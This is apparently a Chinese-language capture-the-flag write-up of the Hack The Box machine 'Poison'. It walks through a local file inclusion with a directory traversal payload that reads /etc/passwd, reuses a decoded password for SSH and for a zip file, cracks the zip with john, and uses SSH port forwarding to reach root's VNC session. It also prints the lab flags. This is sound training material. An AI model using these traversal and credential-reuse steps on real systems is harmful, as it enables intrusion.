Poison-htb-writeup

0x00 靶场技能介绍

章节技能：base64位解码、目录遍历漏洞、本地文件包含漏洞、口令密码复用、zip压缩包密码破解、vncviewer 工具使用、SSH端口转发

参考链接：https://0xdf.gitlab.io/2018/09/08/htb-poison.html

参考链接：https://www.cyberdonald.com/post/hack-the-box-poison

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.84

2、扫描下开放端口

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allport 10.10.10.84  
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 10:32 CST
Warning: 10.10.10.84 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.84
Host is up (0.28s latency).
Not shown: 52931 filtered tcp ports (no-response), 12602 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 74.56 seconds


┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.10.84
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 10:36 CST
Nmap scan report for 10.10.10.84
Host is up (0.28s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.69 seconds

3、访问80端口发现是一个PHP本地文件包含的网站

http://10.10.10.84/

http://10.10.10.84/browse.php?file=listfiles.php

http://10.10.10.84/browse.php?file=pwdbackup.txt

This password is secure, it's encoded atleast 13 times.. what could go wrong really.. Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO Ukd4RVdub3dPVU5uUFQwSwo=

4、按照上面提示内容，对该文件进行13次bae64位解码，得到一个密码

1
2
3

data=$(cat pwd.b64); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data

Charix!2#4%6&8(0

5、同时，发现该 browse.php 文件可以跨目录访问其他文件

http://10.10.10.84/browse.php?file=../../../../../../etc/passwd

# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh

6、通过上面获取的密码和这个 passwd 文件里的用户名，尝试登录靶机

charix

Charix!2#4%6&8(0

┌──(kali㉿kali)-[~/桌面]
└─$ ssh charix@10.10.10.84                                         
The authenticity of host '10.10.10.84 (10.10.10.84)' can't be established.
ED25519 key fingerprint is SHA256:ai75ITo2ASaXyYZVscbEWVbDkh/ev+ClcQsgC6xmlrA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.84' (ED25519) to the list of known hosts.
(charix@10.10.10.84) Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
You can often get answers to your questions about FreeBSD by searching in the
FreeBSD mailing list archives at

        http://www.FreeBSD.org/search/search.html
charix@Poison:~ % id
uid=1001(charix) gid=1001(charix) groups=1001(charix)

7、获取到第一个 user.txt 的内容

charix@Poison:~ % pwd
/home/charix
charix@Poison:~ % ls
secret.zip      user.txt
charix@Poison:~ % cat user.txt
eaacdfb2d141b72a589233063604209c
charix@Poison:~ %

0x02 系统权限获取

8、发现用户根目录下有一个 secret.zip 的压缩包，通过Python开启一个WEB服务进行下载

charix@Poison:~ % ls -la
total 48
drwxr-x---  2 charix  charix   512 Mar 19  2018 .
drwxr-xr-x  3 root    wheel    512 Mar 19  2018 ..
-rw-r-----  1 charix  charix  1041 Mar 19  2018 .cshrc
-rw-rw----  1 charix  charix     0 Mar 19  2018 .history
-rw-r-----  1 charix  charix   254 Mar 19  2018 .login
-rw-r-----  1 charix  charix   163 Mar 19  2018 .login_conf
-rw-r-----  1 charix  charix   379 Mar 19  2018 .mail_aliases
-rw-r-----  1 charix  charix   336 Mar 19  2018 .mailrc
-rw-r-----  1 charix  charix   802 Mar 19  2018 .profile
-rw-r-----  1 charix  charix   281 Mar 19  2018 .rhosts
-rw-r-----  1 charix  charix   849 Mar 19  2018 .shrc
-rw-r-----  1 root    charix   166 Mar 19  2018 secret.zip
-rw-r-----  1 root    charix    33 Mar 19  2018 user.txt
charix@Poison:~ % cat secret.zip | base64 -w 0
base64: Command not found.
charix@Poison:~ % base64 -h
base64: Command not found.
charix@Poison:~ % python3 -m http.server 8000
python3: Command not found.
charix@Poison:~ % python -m http.server 8000
/usr/local/bin/python: No module named http
charix@Poison:~ % python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.10.14.5 - - [06/Jan/2024 04:11:50] "GET / HTTP/1.1" 200 -
10.10.14.5 - - [06/Jan/2024 04:11:51] code 404, message File not found
10.10.14.5 - - [06/Jan/2024 04:11:51] "GET /favicon.ico HTTP/1.1" 404 -
10.10.14.5 - - [06/Jan/2024 04:12:05] "GET /secret.zip HTTP/1.1" 200 -
10.10.14.5 - - [06/Jan/2024 04:13:01] "GET /secret.zip HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/桌面]
└─$ wget http://10.10.10.84:8080/secret.zip 
--2024-01-06 11:13:01--  http://10.10.10.84:8080/secret.zip
正在连接 10.10.10.84:8080... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：166 [application/zip]
正在保存至: “secret.zip”

secret.zip             100%[=========================>]     166  --.-KB/s  用时 0s      

2024-01-06 11:13:01 (8.52 MB/s) - 已保存 “secret.zip” [166/166])

9、本地解压文件进行查看

┌──(kali㉿kali)-[~/桌面]
└─$ unzip secret.zip         
Archive:  secret.zip
[secret.zip] secret password: 
   skipping: secret                  incorrect password

10、发现需要密码，进行密码破解

┌──(kali㉿kali)-[~/桌面]
└─$ zip2john secret.zip > hashzip 
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827 ts=9827 cs=7753 type=0

┌──(kali㉿kali)-[~/桌面]
└─$ john hashzip                                        
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
0g 0:00:04:21  3/3 0g/s 31310Kp/s 31310Kc/s 31310KC/s p0022/0p..p0p0281d
Session aborted

11、但是并没有破解成功，这里复用当前用户的密码，成功解压出来

Charix!2#4%6&8(0

┌──(kali㉿kali)-[~/桌面]
└─$ unzip secret.zip         
Archive:  secret.zip
[secret.zip] secret password: 
 extracting: secret

12、查看该文件类型，发现这个疑似是一个密码的文件

1
2
3

┌──(kali㉿kali)-[~/桌面]
└─$ file secret                       
secret: Non-ISO extended-ASCII text, with no line terminators

13、继续回到初始权限下，查看下进程

charix@Poison:~ % netstat -an -p tcp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0     44 10.10.10.84.22         10.10.14.5.56966       ESTABLISHED
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN
charix@Poison:~ % ps -auwwx | grep vnc
root    529   0.0  0.9  23620  8868 v0- I    03:31     0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
charix 1054   0.0  0.0    412   328  1  R+   05:39     0:00.00 grep vnc
charix@Poison:~ %

14、发现了VNC的进程，下面使用 ssh 进行端口转发到本地

┌──(kali㉿kali)-[~/桌面]
└─$ ssh -L 9999:127.0.0.1:5901 charix@10.10.10.84  
(charix@10.10.10.84) Password for charix@Poison:
Last login: Sat Jan  6 04:05:32 2024 from 10.10.14.5
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
FreeBSD is started up by the program 'init'.  The first thing init does when
starting multiuser mode (ie, starting the computer up for normal use) is to
run the shell script /etc/rc.  By reading /etc/rc and the /etc/rc.d/ scripts,
you can learn a lot about how the system is put together, which again will
make you more confident about what happens when you do something with it.
charix@Poison:~ %

15、本地使用使用 vncviewer 工具和压缩包获取的 secret 进行登录该程序

┌──(kali㉿kali)-[~/桌面]
└─$ vncviewer 127.0.0.1:9999 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

16、成功获取到root的flag信息

root@Poison:~ # id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
root@Poison:~ # id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
root@Poison:~ # cat /root/root.txt
716d04b188419cf2bb99d891272361f5
root@Poison:~ #

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/132

打靶记

#shooting-range

Poison-htb-writeup

https://sh1yan.top/2024/01/06/Poison-htb-writeup/

作者

shiyan

发布于

2024年1月6日

许可协议

TartarSauce-htb-writeup 上一篇

Node-htb-writeup 下一篇